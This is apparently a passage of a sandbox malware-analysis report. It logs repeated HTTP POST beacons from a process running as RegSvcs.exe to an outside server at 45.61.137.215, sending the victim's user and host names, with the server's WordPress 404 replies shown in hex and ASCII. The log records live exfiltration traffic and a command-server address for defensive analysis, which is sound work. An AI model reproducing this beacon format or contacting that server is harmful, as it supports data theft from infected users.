                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            19192.168.2.94973445.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:01.102766037 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:01.107916117 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:03.639303923 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:01 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:03.639317989 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:43:03.639338970 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:43:03.639355898 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:43:03.639367104 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:43:03.639380932 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:43:03.639555931 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:03.639565945 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:43:03.639575958 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:43:03.639590025 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            20192.168.2.94973545.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:03.791896105 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:03.796905041 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:06.300982952 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:04 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:06.301000118 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:43:06.301019907 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:43:06.301032066 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:43:06.301047087 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:43:06.301058054 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:43:06.301127911 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:06.301223993 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:43:06.301235914 CEST1236INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:43:06.301246881 CEST1236INData Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b
                                            Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            21192.168.2.94973645.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:06.437304020 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:06.442362070 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:09.134901047 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:07 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:09.134921074 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:09.134934902 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:09.134947062 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:43:09.134958029 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:43:09.135004044 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:09.135015011 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:43:09.135026932 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
